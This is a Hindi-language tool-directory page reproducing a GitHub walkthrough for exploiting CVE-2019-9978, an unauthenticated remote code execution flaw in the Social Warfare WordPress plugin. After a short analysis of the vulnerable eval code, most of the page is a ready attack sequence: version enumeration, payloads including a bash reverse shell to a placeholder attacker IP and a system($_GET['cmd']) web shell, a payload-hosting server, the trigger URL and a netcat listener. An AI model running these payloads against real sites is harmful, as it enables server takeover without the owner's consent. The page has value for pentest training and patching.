Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/tokyohunter/cve-2019-9978-social-warfare-wordpress-rce
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubtokyohunter/cve-2019-9978-social-warfare-wordpress-rce

CVE-2019-9978-Social-Warfare-WordPress-RCE

CVE-2019-9978 के लिए एक पूर्ण वॉकथ्रू और एक्सप्लॉइट - Social Warfare WordPress plugin ≤ 3.5.2 में अनऑथेंटिकेटेड रिमोट कोड एक्जीक्यूशन। इसमें कमजोर कोड विश्लेषण और पेलोड उदाहरण शामिल हैं।

रिपॉजिटरी देखें
122 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Gemini_Generated_Image_a1skbua1skbua1sk

🚀 CVE-2019-9978 – Social Warfare WordPress Plugin RCE

⚠️ अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। केवल उन्हीं सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत पहुँच अवैध है।


📋 अवलोकन

गुणमान
CVE IDCVE-2019-9978
प्रभावित सॉफ्टवेयरSocial Warfare Plugin ≤ 3.5.2 (WordPress)
भेद्यता प्रकाररिमोट कोड निष्पादन (RCE) / रिमोट फ़ाइल समावेशन (RFI)
प्रमाणीकरण आवश्यक❌ नहीं – अप्रमाणित
CVSS स्कोर9.8 (गंभीर)
समाधान किया गयासंस्करण 3.5.3
जंगली में शोषितहाँ – मार्च 2019

Social Warfare प्लगइन एक लोकप्रिय WordPress प्लगइन है जो वेबसाइटों पर सोशल शेयरिंग बटन जोड़ता है। संस्करण 3.5.0 से 3.5.2 में एक गंभीर RCE भेद्यता है जो हमलावरों को बिना किसी प्रमाणीकरण के सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देती है।


इस प्लगइन का उपयोग क्या है?

Social Warfare एक लोकप्रिय WordPress प्लगइन है जो वेबसाइटों पर सोशल शेयरिंग बटन जोड़ता है, जिससे आगंतुक आसानी से प्लेटफ़ॉर्म पर सामग्री साझा कर सकते हैं:

  • Facebook
  • Twitter / X
  • Pinterest
  • LinkedIn
  • Reddit
  • WhatsApp

sc1


मूल कारण विश्लेषण

भेद्य कोड

root@kitploit:~
if ( true == SWP_Utility::debug( 'load_options' ) ) {
    // ⚠️ CRITICAL MISUNDERSTANDING:
    // is_admin() only checks if the page is in /wp-admin/
    // It does NOT verify authentication or user privileges!
    if ( is_admin() ) {
        wp_die( 'You do not have authorization to view this page.' );
    }

    // Step 1: Fetch remote file from user-controlled URL
    // No validation, no sanitization, no whitelist!
    $options = file_get_contents( $_GET['swp_url'] . '?swp_debug=get_user_options' );

    // Step 2: Extract content between <pre> tags
    if ( strpos( $options, '<pre>' ) !== false ) {
        $options = str_replace( '<pre>', '', $options );
        $cutoff = strpos( $options, '</pre>' );
        $options = substr( $options, 0, $cutoff );
    }

    // Step 3: Build PHP code string
    $array = 'return ' . $options . ';';

    // Step 4: 💀 CRITICAL FLAW - User-supplied code is executed!
    try {
        $fetched_options = eval( $array ); // <-- Remote Code Execution
        // ... rest of the migration logic
    } catch ( ParseError $e ) {
        // ... error handling
    }
}

is_admin() सुरक्षा क्यों नहीं है

WordPress फ़ंक्शन is_admin() यह जाँच नहीं करता है कि उपयोगकर्ता लॉग इन है या उसके पास व्यवस्थापक विशेषाधिकार हैं। यह केवल जाँचता है कि अनुरोधित पृष्ठ /wp-admin/ निर्देशिका के अंतर्गत है या नहीं:

root@kitploit:~
function is_admin() {
    return defined('WP_ADMIN') && WP_ADMIN;
    //  Does NOT check authentication!
    //  Does NOT check user role!
}

विडंबना: जब आप /wp-admin/admin-post.php तक पहुँचते हैं, तो WordPress WP_ADMIN = true परिभाषित करता है। इससे is_admin() अप्रमाणित अनुरोधों के लिए भी true लौटाता है, जो भेद्य कोड ब्लॉक को निष्पादित करने में सक्षम बनाता है।

यहाँ भेद्यता है!

root@kitploit:~
 $options = file_get_contents( $_GET['swp_url'] . '?swp_debug=get_user_options' );

    if ( strpos( $options, '<pre>' ) !== false ) {
        $options = str_replace( '<pre>', '', $options );
        $cutoff = strpos( $options, '</pre>' );
        $options = substr( $options, 0, $cutoff );
    }

    $array = 'return ' . $options . ';';

    try {
        $fetched_options = eval( $array ); // <-- Remote Code Execution
    }

प्लगइन में एक छिपी हुई "डीबग" सुविधा थी जो डेवलपर्स को बाहरी URL से कॉन्फ़िगरेशन फ़ाइलें लोड करने में मदद करने वाली थी। हालाँकि, इस सुविधा में एक घातक दोष था: यह उपयोगकर्ता द्वारा प्रदान किए गए URL से कोई भी फ़ाइल डाउनलोड करेगा और उसके अंदर जो भी कोड मिले उसे निष्पादित करेगा — बिना अनुमति मांगे या यह जाँचे कि उपयोगकर्ता अधिकृत है या नहीं।

शोषण सरल है:

एक हमलावर अपने स्वयं के सर्वर पर एक दुर्भावनापूर्ण फ़ाइल होस्ट करता है, प्लगइन को इसे डाउनलोड करने का निर्देश देता है, और प्लगइन अंधाधुंध रूप से हमलावर के कोड को पीड़ित की वेबसाइट पर चलाता है। चूंकि प्लगइन को ट्रिगर करने के लिए आपको लॉग इन होने की आवश्यकता नहीं है, URL जानने वाला कोई भी व्यक्ति वेबसाइट पर कब्जा कर सकता है।

इसे इस तरह समझें: एक सुरक्षा गार्ड की कल्पना करें जो "डीबग मोड" कहने पर कोई भी दरवाजा खोल देता है — बिना यह जाँचे कि आप वहाँ काम करते हैं या आपके पास बैज है। यही इस भेद्यता ने किया।

शोषण को 2 <pre></pre> टैग के बीच लिखा जाना चाहिए।


💀 शोषण वॉकथ्रू

चरण 1: भेद्य लक्ष्य की पहचान करें या WordPress और यह प्लगइन स्थापित करें, फिर चरणों का पालन करें

Social Warfare प्लगइन संस्करण की पहचान करने के लिए WPScan का उपयोग करें:

root@kitploit:~
wpscan --url http://target.com --enumerate vp
  • Social Warfare प्लगइन संस्करण ≤ 3.5.2

यदि आपने स्वयं स्थापित किया है, तो एडमिन पैनल से प्लगइन को सक्रिय करना न भूलें।


चरण 2: पेलोड फ़ाइल बनाएँ

अपने इच्छित पेलोड के साथ payload.txt बनाएँ और फिर उस पेलोड को सर्व करने के लिए एक सर्वर बनाएँ।

उदाहरण पेलोड:

परीक्षण पेलोड (RCE सत्यापित करें):

root@kitploit:~
<pre>phpinfo();</pre>

आउट-ऑफ-बाउंड परीक्षण:

root@kitploit:~
<pre>@file_get_contents('http://burp collabrator');</pre>

लिनक्स रिवर्स शेल:

root@kitploit:~
<pre>system("bash -c \"bash -i >& /dev/tcp/YOUR_IP/4444 0>&1\"");</pre>

इंटरैक्टिव कमांड निष्पादक:

root@kitploit:~
<pre>system($_GET['cmd']);</pre>

चरण 3: पेलोड होस्ट करें

अपने पेलोड को होस्ट करने के लिए Python HTTP सर्वर प्रारंभ करें:

root@kitploit:~
python3 -m http.server 8000

आपका पेलोड अब यहाँ उपलब्ध है: http://YOUR_IP:8000/payload.txt

यदि आप localhost का उपयोग करते हैं:

root@kitploit:~
http://127.0.0.1:8000/payload.txt

भेद्य कोड से अनुरोध करने के बाद आपको 200 स्थिति कोड देखना चाहिए:

sc3


चरण 4: शोषण को ट्रिगर करें

विकल्प A – मैन्युअल ट्रिगर:

अपने ब्राउज़र में इस URL पर जाएँ या curl का उपयोग करें:

root@kitploit:~
http://wordpress ip or domain/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_IP:8000/payload.txt

फिर से यदि आप localhost का उपयोग करते हैं:

root@kitploit:~
http://wordpress ip or domain/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://127.0.0.1:8000/payload.txt

चरण 5: रिवर्स शेल को कैप्चर करें (रिवर्स शेल पेलोड के लिए)

root@kitploit:~
nc -lvnp 4444

यदि सफल होता है, तो आपको एक शेल मिलेगा!


परिणाम:

root@kitploit:~
<pre>@file_get_contents('http://burp collabrator');</pre>

sce

root@kitploit:~
<pre>phpinfo();</pre>

sc4


हैप्पी हैकिंग! 🚀

टूल डाउनलोड करें